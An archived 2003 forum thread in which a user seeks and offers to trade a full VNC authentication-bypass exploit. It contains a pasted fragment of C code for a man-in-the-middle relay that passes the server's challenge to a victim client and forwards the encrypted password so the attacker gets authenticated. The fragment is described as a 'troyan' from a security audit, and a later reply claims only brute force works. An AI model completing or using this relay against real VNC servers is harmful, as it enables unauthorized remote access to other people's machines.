Hi I know that there is an exploit to bypass the vnc authentication by using a mitm.
I found serveral sources for the mitm code, but not the whole exploit. There's only a smart part published on the web of the exploit.
Does someone have the whole (maybe compiled) source code of the vnc weak authentication exploit (remote of course ) And would give it to me, or swap it with me? I'm a skilled vb coder
German: Moin Es gibt einen weak authentication exploit ... nun ja ich finde nur die mitm codes, aber net den kompletten exploit code. Es gibt nur ein kleines stück des richtigen exploits. Hat irgendwer von euch zufällig diesen ganzen exploit code, (auch compiliert ) und würde es mir geben!? Oder tauschen? Ich kann sehr gut visual basic coden
Cya Flinston
thatsmej
Oct 7 2003, 06:30 AM
yeah, i recently was searching for it to..
i found something like it..
but i`m not at home now.....
point your browser to www.securiteam.com
there you can find the source ( i thought )
Flinston
Oct 7 2003, 08:07 AM
well you only find an small part of the exploit there ...
You cant compile it. At first you need thousands of header packages and twice its not an real exploit ... just "how it would be" and I'm not able to code this piece of code into an real exploit, even if I would have the header packages ...
/* we connect to the real VNC server */ if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) { perror ("connect"); exit (-1); }
/* again, we read version number from the VNC server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); }
strcpy (buf, "RFB 003.003\n");
/* and we send ours */ if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) { perror ("write"); exit (-1); }
/* we now read authenticarion method code from VNC server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); }
/* here is the challenge from server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); }
/* we send the challenge to the victim client */ if (write (clientfd, buf, 16) < 16) { perror ("write"); exit (-1); }
/* we have the encrypted password from the client */ if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); }
/* we send the encrypted password to the VNC server */ if (write (vncfd, buf, 16) < 16) { perror ("write"); exit (-1); }
/* we read the result from the authentication process */ if (read (vncfd, buf, BUFSIZ) < 4) { perror ("read"); exit (-1); }
/* at this point we should be authenticated */ /* place whatever code you want here */
close (clientfd); close (sockfd); close (vncfd);
return 0; }
Flinston
Oct 7 2003, 10:29 AM
bleh ;P Try to compile it ... i tried it for hours ... even if you'll get all header packages you'll find out that THIS is only A SHORT PIECE of the whole exploit !
This is one piece of code I used in a security audit.
In it, we got to fake entries in the DNS server of the machines accessing one VNC server (inside the audited internal network), so I just wrote this little troyan to demonstrate how we could bypass the challenge - response mecanism imposed by VNC to protect password from being sniffed.
I hope it can be useful for someone X-)
monolith
Oct 9 2003, 10:29 PM
I don't think its possible to exploit a vnc-server. You just need to check out the source code of WinVNC to see that. It works that way:
1. The Client (you) connect to the VNC-Server 2. WinVNC creates a RANDOM! Challenge-Code 3. It sends the Challenge-Code to the Client 4. The Client crypts the password you entered with the challenge code 5. WinVNC Server crypts the right password (from the registry) with the challenge-code it sent to you. 6. Now the Server compares his own challenge code with the one it got from you. If its right you become authenticated.
so... winvnc does not send a crypted pass or nothing other interesting data to you... the only way... is brute-force
greets Monolith
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
)